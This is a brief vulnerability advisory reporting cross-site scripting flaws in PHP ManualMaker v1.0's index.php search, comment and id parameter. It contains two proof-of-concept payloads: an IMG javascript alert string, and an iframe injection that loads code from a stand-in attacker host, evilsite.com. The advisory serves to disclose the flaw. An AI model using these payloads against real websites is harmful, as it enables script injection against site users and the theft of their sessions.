PHP ManualMaker v1.0 suffers from XSS.
6fdad6c757aaea25e684d9b2a700e0c7a44870f16ab564f703a6f64c63003df5
PHP ManualMaker v1.0
Homepage:
http://deltascripts.com/phpmanualmaker/
Effected files:
index.php
Search boxes
Comment boxes
XSS proof of concept:
Input in search or comment box:
">">">'><IMG SRC=javascript:alert('XSS')><""><'<"
XSS via URL injection of id:
http://www.example.com/manualmaker/index.php?print=1&id=<iframe src=http://evilsite.com/evilcode.html <